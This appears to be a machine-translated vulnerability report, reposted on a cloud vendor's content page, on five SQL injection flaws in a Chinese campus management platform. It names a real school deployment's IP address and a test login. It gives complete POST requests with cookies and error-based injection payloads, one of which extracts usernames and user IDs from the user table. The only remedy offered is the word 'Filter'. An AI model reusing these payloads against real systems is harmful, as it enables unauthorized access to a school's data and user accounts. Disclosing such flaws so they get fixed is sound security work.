General campus management platform SQL injection 1-5

Source: Internet
Author: User

Beijing lezhi line Software Limited Company, general campus management platform official case: http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml our Beijing 101 Middle School For example: Case URL: http: // 202.108.154.209/datacenter/# test user: test123/123456 first SQL injection: 1. Common Student User Login 2. weekly calendar -- export calendar -- OK 3. Send the following request: Link: http: // 202.108.154.209/oa/calendar/exportExcel. do

POST:exportStartDate=2014-03-03&exportEndDate=2014-03-04&exportCalendars=zhaojinfeng2%E6%97%A5%E5%8E%86&exportCalendarIds=16d07c5ff5e44036b5a44751ab2df91e') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((user()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and ('1'='1

 

SQL Injection exportCalendars. After the request is sent, the file will be downloaded, And the injected content will be in this file. OK. download the file. Opening the file is the result of our injection: second SQL injection: 1. Common Student users log on to the system. 2. Choose a calendar for one week to modify the calendar. (No calendar is created) -- save changes 3. When saving is a packet capture modify problem parameters modify c0-e1 parameters in the c0-e1, send the modified parameters as follows:
POST /oa/dwr/call/plaincall/calendarRemoteCallController.saveEvent.dwr HTTP/1.1Host: 202.108.154.209Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026acallCount=1windowName=pageContentc0-scriptName=calendarRemoteCallControllerc0-methodName=saveEventc0-id=0c0-e1=string:0e362687769f426380ab1b8a015ef014' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='ac0-e2=string:c0-e3=string:1111111111111c0-e4=string:2014-03-04c0-e5=string:2014-03-04c0-e6=boolean:truec0-e7=boolean:truec0-e8=string:rgb(230%2C115%2C153)c0-e9=number:1c0-e10=null:nullc0-e11=string:-1c0-e12=number:2c0-e13=string:arrangec0-e14=number:0c0-e15=null:nullc0-e16=null:nullc0-e17=string:c0-e18=string:c0-e19=string:c0-e20=string:c0-e21=string:0c0-param0=Object_Object:{id:reference:c0-e1, eventId:reference:c0-e2, title:reference:c0-e3, start:reference:c0-e4, end:reference:c0-e5, allDay:reference:c0-e6, editable:reference:c0-e7, backgroundColor:reference:c0-e8, priority:reference:c0-e9, calendarNameId:reference:c0-e10, remind:reference:c0-e11, privacy:reference:c0-e12, eventType:reference:c0-e13, eventStatus:reference:c0-e14, calendarProjectId:reference:c0-e15, arrangeRelation:reference:c0-e16, messageTaskId:reference:c0-e17, dutier:reference:c0-e18, parter:reference:c0-e19, site:reference:c0-e20, xlts:reference:c0-e21}c0-param1=string:c0-param2=boolean:falsec0-param3=boolean:truebatchId=25page=%2Foa%2F%2Fcalendar%2FinitCalendar.do%3F__time__%3D1394571647842httpSessionId=scriptSessionId=4C1126686168926E787E3EBB1EA961EF

 

If an error is returned, the expected data is successfully injected into the error message. The third part is SQL injection: 1. log on to a common student user. 2. Add my vote on my desktop. Search for the topic. 3. Capture packets and modify the criteria and criteria parameters. Send the following request:
POST /datacenter/vote/myVoteList.do HTTP/1.1Host: 202.108.154.209Cookie: aae03b698ecd444aa0ae02f8d87c026a_search=false&nd=1394576122963&rows=50&page=1&sidx=from_date&sord=desc&criteria=theme+like+'%25123%25'+AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='a'

 

The desired data is successfully injected. The fourth part is SQL injection: 1. Common Student User Login 2. My portal-add portal items-Common Information 3. Publish common information 4. When publishing a message, cut the packet and modify it, the parameter ID has the following request sent by SQL injection: URL: http: // 202.108.154.209/oa // mail/personal/save. do
POST:privat=2&portlet=portlet&xxzt=complete&id=822b6cdadc7140fe91da513963d4efdc' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT user()),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) and 'a'='a&xxbt=222222&fbsf=个人:zhaojinfeng2&fjrsf=&info=<p>222222<br/></p>&editorValue=<p>222222<br/></p>Cookie: AQ_AUTHENTICATION_COOKIE_KEY=aae03b698ecd444aa0ae02f8d87c026a

 

User () Data injected successfully: SQL Injection: 1. log on to a common student user. 2. log on to my desktop, add the desktop, and go to campus office. 3. Go to the mail center. 4. Write a letter. When writing a letter, Preview It. http: // 202.108.154.209/oa/dwr/call/plaincall/MailController. getNotReadtotalNumByClassify. dwr POST parameter c0-param0 has injection, When you modify the c0-param0 to: c0-param0 = string: 2' AND (SELECT 1 FROM (select count (*), CONCAT (0x23, (SELECT concat (username, 0x23, user_id) from aq_user limit 0, 1), 0x23, FLOOR (RAND (0) * 2) x FROM INFORMATION_SCHEMA.CHARACTER_SETS group by x) a) AND 'A' = 'a inject the username AND user_id to send the following request: Connection: http: // 202.108.154.209/oa/dwr/call/plaincall/MailController. getNotReadtotalNumByClassify. dwr
POST:callCount=1windowName=c0-scriptName=MailControllerc0-methodName=getNotReadtotalNumByClassifyc0-id=0c0-param0=string:2' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x23,(SELECT concat(username,0x23,user_id) from aq_user limit 0,1),0x23,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'a'='abatchId=112page=%2Fdatacenter%2Fportlet%2FshowPortletList.do%3FmenuId%3Ded57d3b21fff48738552a4601ed30e55httpSessionId=scriptSessionId=3756A70426EB76F99A0BBDDF3AC4FEBC

 



Solution: Filter

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.